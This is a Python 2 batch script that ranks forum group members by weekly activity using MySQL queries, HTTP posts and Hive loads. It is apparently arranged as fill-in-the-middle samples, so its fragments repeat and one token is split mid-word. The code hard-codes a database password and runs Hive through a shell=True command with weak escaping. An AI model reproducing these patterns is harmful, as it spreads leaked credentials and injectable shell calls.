dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| runHiveQL | identifier_name |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8')
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(use | esultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = "category=user&type=grpactive&cache=0&ids=%(users)s&counts=%(scores)s" % {'url':urlparse(posturl).path, 'users':','.join(resultusers), 'scores':','.join(resultscores)}
posturl = "%(url)s?%(data)s" % {'url':urlparse(posturl).path, 'data':postdata}
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=posturl,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(2)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#输出结果集格式定义(与结果表bing.rpt_grp_weekactrank_dm 结构一致)
fieldsdelimiter, rowsdelimiter = '\t', '\n'
resultrowformat = \
"%(user_id)s" + fieldsdelimiter + \
"%(topic_num)d" + fieldsdelimiter + \
"%(startopic_num)d" + fieldsdelimiter + \
"%(comment_num)d" + fieldsdelimiter + \
"%(commentnum_web)d" + fieldsdelimiter + \
"%(commentnum_app)d" + fieldsdelimiter + \
"%(score)d" + fieldsdelimiter + \
"%(sn)d" + rowsdelimiter
#输出结果集文件
logger.debug("writing file ...")
resultchunk, top = [], 0
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
resultline = resultrowformat % { \
'user_id':resultset[item]['userid'], \
'topic_num':resultset[item].get('topicnum',0), \
'startopic_num':resultset[item].get('startopicnum',0), \
'comment_num':resultset[item].get('commentnum',0), \
'commentnum_web':resultset[item].get('commentnum_web',0), \
'commentnum_app':resultset[item].get('commentnum_app',0), \
'score':resultset[item]['score'], \
'sn':resultset[item]['sn'] \
}
resultchunk.append(resultline)
tmpfilename = "rpt_grp_memberweekactrank_dm_%(statisdate)s.dat" % {'statisdate':statisdate}
tmpfile = "%(dir)s/%(tmpfilename)s" % {'dir':tmpdir, 'tmpfilename':tmpfilename}
tmpwriter = open(tmpfile,'w')
tmpwriter.writelines(resultchunk)
tmpwriter.close()
#加载入Hive表
logger.debug("loading hive ...")
runHiveQL("load data local inpath '%(tmpfile)s' overwrite into table bing.rpt_grp_memberweekactrank_dm partition (statis_date='%(statis_date)s');" % {'tmpfile':tmpfile, 'statis_date':statis_date})
#为展现附加一个提供了名字的hive表
sqlstmt = r"""
set hive.auto.convert.join=false;
insert overwrite table bing.rpt_grp_memberweekactrank_dm_name partition (statis_date='%(statis_date)s')
select
t.user_id,
u.username,
t.topic_num,
t.startopic_num,
t.comment_num,
t.commentnum_web,
t.commentnum_app,
t.score,
t.sn
from (select * from bing.rpt_grp_memberweekactrank_dm where statis_date='%(statis_date)s') t
inner join haodou_passport_%(rundate)s.`User` u on (t.user_id=u.userid)
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statis_date':statis_date \
}
runHiveQL(sql)
logger.info("end.(%d)" % retval)
sys.exit(retval)
| rid)
r | conditional_block |
memberweekactrank.py | #! /usr/bin/env python
# -*- coding: utf-8 -*-
import sys, os, datetime, time
import logging
from optparse import OptionParser
import string, codecs
import subprocess
import MySQLdb
import json, phpserialize
import httplib, urllib, socket
from urlparse import urlparse
import re
def mklogfile(s):
if not os.path.exists(s):
f=open(s,'w')
f.write('.log\n')
f.close()
os.chmod(s, 0666)
def isdate(s):
try:
time.strptime(str(s).replace('-',''),'%Y%m%d')
return True
except:
return False
def isnum(s):
ret = re.match(r'[+-]?\d*[\.]?\d*$', s)
return True if ret!=None else False
def getweekfirstday(dt):
try:
return dt + datetime.timedelta(days=1-dt.isoweekday())
except:
return None
def getweeklastday(dt):
try:
return dt + datetime.timedelta(days=7-dt.isoweekday())
except:
return None
def isweekend(s):
try:
return datetime.datetime.strptime(s,'%Y%m%d').isoweekday() == 7
except:
return False
def ismonthend(s):
try:
return (datetime.datetime.strptime(s,'%Y%m%d') + datetime.timedelta(days=1)).day == 1
except:
return False
def delbom(s):
if s[0]==codecs.BOM_UTF8:
return s[1:]
else:
return s
def delctrlchr(s, cc = '\n\t\r'):
return str(s).translate(string.maketrans(cc,' '*len(cc)))
def sqlEscape(s):
try:
ret = str(s).replace('\\','\\\\')
ret = ret.replace('`','\\`')
return ret
except:
return None
def runHiveQL(s):
logger.debug("sql# %s" % s)
cmd = 'hive -S -e "%(sql)s"' % {'sql':sqlEscape(s)}
proc = subprocess.Popen(cmd, shell=True, env=os.environ, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
hiveout, errmsg = proc.communicate()
retval = proc.wait()
if retval!=0:
logger.error("HiveError!!!(%d)" % retval)
logger.error("Debug Info: %s" % str(errmsg))
sys.exit(retval)
return hiveout
def getscore(t):
return int(t.get('topicnum',0)*WEIGHTS[c_topicnum][c_default] + \
t.get('commentnum',0)*WEIGHTS[c_commentnum][c_default] + \
t.get('startopicnum',0)*WEIGHTS[c_startopicnum][c_default] + \
t.get('isnewuser',0)*WEIGHTS[c_isnewuser][c_default]
)
reload(sys)
sys.setdefaultencoding('utf8') |
retval = 0
##运行时变量
pid = os.getpid()
rundate = datetime.date.today().strftime("%Y%m%d")
rundir = os.path.dirname(os.path.abspath(__file__))
runfilename = os.path.splitext(os.path.split(os.path.abspath(__file__))[1])[0]
logdir = rundir + '/log'
tmpdir = rundir + '/tmp'
if not os.path.exists(logdir):
os.mkdir(logdir,0777)
if not os.path.exists(tmpdir):
os.mkdir(tmpdir,0777)
logfile = '%(dir)s%(sep)s%(filename)s.log' % {'dir':logdir,'sep':os.sep,'filename':runfilename,'rundate':rundate,'pid':pid}
if not os.path.exists(logfile):
mklogfile(logfile)
##日志器
logger = logging.getLogger('task')
logger.setLevel(logging.DEBUG)
fileHandler = logging.FileHandler(logfile)
fileHandler.setLevel(logging.INFO)
fileHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(levelname)s - %(message)s"))
logger.addHandler(fileHandler)
consoleHandler = logging.StreamHandler()
consoleHandler.setLevel(logging.INFO)
consoleHandler.setFormatter(logging.Formatter("%(asctime)s\tpid#%(process)d\t%(filename)s\n%(message)s"))
logger.addHandler(consoleHandler)
logger.info("begin execute... %s" % str(sys.argv))
##参数解析
usageinfo = "%prog [--date=statisdate] [--post] [-v]"
parser = OptionParser(usage=usageinfo, version="%prog v0.1.0")
parser.set_defaults(statisdate=(datetime.datetime.strptime(rundate,'%Y%m%d')+datetime.timedelta(days=-1)).strftime('%Y%m%d'))
parser.add_option('-d', '--date', dest='statisdate', help='statis date, yyyy-mm-dd or yyyymmdd', metavar='DATE')
parser.add_option('-p', '--post', action='store_true', dest='postmode', default=False, help='post mode', metavar='MODE')
parser.add_option('-v', '--verbose', action='store_true', dest='verbosemode', default=False, help='verbose mode', metavar='MODE')
(options, args) = parser.parse_args()
statisdate = options.statisdate.replace('-','')
postmode = options.postmode
verbosemode = options.verbosemode
#参数检查
if verbosemode:
consoleHandler.setLevel(logging.DEBUG)
if not isdate(statisdate):
logger.error("unconverted date %s" % statisdate)
sys.exit(-101)
#日期变量
dt_statisdate = datetime.datetime.strptime(statisdate,'%Y%m%d')
statis_date = dt_statisdate.strftime('%Y-%m-%d')
statis_week = getweekfirstday(dt_statisdate).strftime('%Y-%W')
statisweek_firstday = getweekfirstday(dt_statisdate).strftime('%Y-%m-%d')
statisweek_lastday = getweeklastday(dt_statisdate).strftime('%Y-%m-%d')
preday90_date = (dt_statisdate+datetime.timedelta(days=-90)).strftime("%Y-%m-%d")
#指标权重系数配置
c_topicnum, c_commentnum, c_startopicnum, c_isnewuser = range(4)
INDEX_FACTOR = [2.0, 1.0, 0.5, 50.0]
c_default, c_app, c_web = range(3)
SOURCE_FACTOR = [1.0, 1.2, 0.8]
WEIGHTS = []
for index in INDEX_FACTOR:
row = []
for source in SOURCE_FACTOR:
row.append(index*source)
WEIGHTS.append(row)
resultset = {}
#数据来源
logger.debug("connecting mysql ...")
dbconn = MySQLdb.connect(host='10.0.10.85',user='bi',passwd='bi_haodou',port=3306,charset='utf8')
sqlcursor = dbconn.cursor()
#获取小组管理员。小组管理员不纳入小组成员排名
sqlstmt = r"""
select GroupAdmins as admin1, ManageMaster as admin2, ManageSlave as admin3
from haodou_center.GroupCate
where parentid!=0
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
ignoreusers = []
for (admin1, admin2, admin3) in dataset:
if admin1 is not None:
admin = phpserialize.loads(admin1.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin2 is not None:
admin = phpserialize.loads(admin2.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
if admin3 is not None:
admin = phpserialize.loads(admin3.encode('utf-8'))
for item in admin:
if int(item) not in ignoreusers:
ignoreusers.append(int(item))
logger.debug("ignoreusers: %s" % ignoreusers)
#获取新用户。3个月内注册
sqlstmt = r"""
select userid
from haodou_passport.User
where status=1 and regtime>'%(preday90_date)s 00:00:00'
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday, \
'preday90_date':preday90_date \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
newusers = []
for row in dataset:
newusers.append(row[0])
#计算回复指标
sqlstmt = r"""
select ut.userid as userid,
count(uc.commentid) as commentnum,
count(case when uc.sourceid=0 then uc.commentid end) as commentnum_web,
count(case when uc.sourceid in (1,2) then uc.commentid end) as commentnum_app
from
(select commentid, userid, itemid as topicid, Platform as sourceid
from haodou_comment.Comment
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and type = '6' and status = '1'
) uc,
haodou_center.GroupTopic ut
where uc.topicid=ut.topicid
group by ut.userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, commentnum, commentnum_web, commentnum_app) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['commentnum'] = int(commentnum)
resultset[userid]['commentnum_web'] = int(commentnum_web)
resultset[userid]['commentnum_app'] = int(commentnum_app)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
#计算话题指标
sqlstmt = r"""
select
userid,
count(topicid) as topicnum,
count(case when digest=1 or recommend=1 then topicid end) as startopicnum
from haodou_center.GroupTopic
where createtime between '%(statisweek_firstday)s 00:00:00' and '%(statisweek_lastday)s 23:59:59'
and status='1'
group by userid
;
"""
sql = delctrlchr(sqlstmt,'\t\r')
sql = sql % {'rundate':rundate, \
'statisdate':statisdate, \
'statis_date':statis_date, \
'statis_week':statis_week, \
'statisweek_firstday':statisweek_firstday, \
'statisweek_lastday':statisweek_lastday \
}
logger.debug("sql# %s" % sql)
sqlcursor.execute(sql)
dataset = sqlcursor.fetchall()
for (userid, topicnum, startopicnum) in dataset:
if userid in ignoreusers:
continue
if userid not in resultset:
resultset[userid] = {}
resultset[userid]['statis_date'] = statis_date
resultset[userid]['userid'] = int(userid)
resultset[userid]['topicnum'] = int(topicnum)
resultset[userid]['startopicnum'] = int(startopicnum)
resultset[userid]['isnewuser'] = 1 if userid in newusers else 0
sqlcursor.close()
dbconn.commit()
dbconn.close()
#计算活跃度得分
for item in resultset:
resultset[item]['score'] = getscore(resultset[item])
#计算排名(按活跃度得分从大到小排序)
resultusers, resultscores, top = [], [], 50
sortset = [(resultset[item]['score'], resultset[item]['userid']) for item in resultset]
sortset.sort(reverse=True)
for (index, item) in enumerate(sortset):
resultset[item[1]]['sn'] = index+1
if top==0 or index<top:
resultusers.append(str(item[1]))
resultscores.append(str(item[0]))
#推送第1次
if postmode:
logger.debug("sending data (1)...")
#简化结果集(格式与推送接口约定保持一致)
simpleset, top = {}, 50
simpleset['gid'] = 'user_rank'
simpleset['users'] = []
for item in resultset:
if top>0 and resultset[item]['sn']>top:
continue
simpleitem = {}
simpleitem['uid'] = resultset[item]['userid']
simpleitem['rank'] = resultset[item]['sn']
simpleitem['score'] = resultset[item]['score']
simpleset['users'].append(simpleitem)
simpledata = json.dumps(simpleset)
#推送
posturl = 'http://211.151.151.230/data/userrank'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
postdata = simpledata
logger.info("postdata: %s" % postdata)
try:
httpconn.request(method='POST',url=urlparse(posturl).path,body=postdata,headers=headers);
httpresp = httpconn.getresponse()
httpstatus, httpreason, httptext = httpresp.status, httpresp.reason, httpresp.read()
httpconn.close()
if httpresp.status!=httplib.OK:
logger.error('数据发送失败!(1)')
logger.error("Debug Info: %s %s - %s" % (httpstatus, httpreason, httptext))
except (httplib.HTTPException, socket.error) as ex:
logger.error("网络错误:%s" % ex)
#推送第2次
if postmode:
logger.debug("sending data (2)...")
posturl = 'http://211.151.151.230/data/top'
httpconn = httplib.HTTPConnection(urlparse(posturl).netloc, timeout=10)
headers = {'Host':'search.haodou.com', 'Accept-Charset':'UTF-8'}
